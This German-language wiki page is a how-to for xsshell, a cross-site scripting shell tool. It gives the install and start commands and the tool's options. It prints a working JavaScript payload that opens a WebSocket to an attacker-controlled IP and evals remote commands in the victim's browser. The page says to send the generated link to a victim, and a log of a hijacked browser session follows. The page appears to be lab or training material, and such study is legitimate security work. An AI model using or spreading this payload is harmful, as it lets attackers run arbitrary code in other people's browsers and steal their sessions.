Xsshell

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

git clone

  • sudo apt-get install go
  • go get github.com/raz-varren/xsshell
  • go install github.com/raz-varren/xsshell

start

  • ./xsshell -host 127.0.0.1 -port 4444

xsshell -h Usage of xsshell: 

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

  • Payload muss ins Eingabefeld
  • Generierter Link wird zum Opfer geschickt


JS Script : <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>

Die Shell

start socket: 1, header: AqHFTtA=

socket connected: 1 

   user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 
   page url:   http://127.0.0.1/xss.php?msg=%3Cscript%3E%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22ws%3A%2F%2F10.82.70.52%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3C%2Fscript%3E&submit=klick 
   referrer:   http://127.0.0.1/xss.php?msg=%3Cscript%28function%28%29%7Bfunction+e%28a%2Cb%29%7Breturn+function%28%29%7Breturn+eval%28a%29%7D.call%28b%29%7Dvar+d%3Dnew+WebSocket%28%22http%3A%2F%2F10.82.70.59%3A4444%2Fs%22%29%2Cf%3Dfunction%28a%29%7Bthis.send%3Dfunction%28b%2Cc%29%7Bd.send%28%28c%3F%22z%22%3A%22%22%29%2Ba%2Bb%29%7D%7D%3Bd.onmessage%3Dfunction%28a%29%7Ba%3Da.data%3Bvar+b%3Dnew+f%28a.slice%280%2C8%29%29%3Btry%7Be%28a.slice%288%29%2Cb%29%7Dcatch%28c%29%7Bb.send%28c%2C%210%29%7D%7D%7D%29%28%29%3B%3E%3C%2Fscript%3E&submit=klick
   cookies:
end socket: 1, header: AqHFTtA=

Auf dem Client

Xss-poc-js-sh1.png

Links

Abgerufen von „http://wiki.ixheim.de/index.php?title=Xsshell&oldid=26279